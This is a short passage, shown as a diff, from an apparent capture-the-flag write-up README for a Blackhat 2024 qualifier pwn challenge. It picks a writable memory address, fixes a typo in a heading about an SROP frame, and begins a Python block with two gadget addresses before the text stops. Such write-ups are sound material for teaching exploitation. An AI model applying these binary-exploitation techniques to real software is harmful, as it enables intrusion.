yaso-bash/CTF-writeups/Blackhat quals 2024/pwn/README.md

 the purple region is our writable space, for caution we will take 0x403000 + 100 = 0x0x403100

-# Our first SROP frmae for reading
+# Our first SROP frame for reading
 ```python
 POP_RAX = 0x0000000000401001
 SYSCALL_RET = 0x0000000000401a8b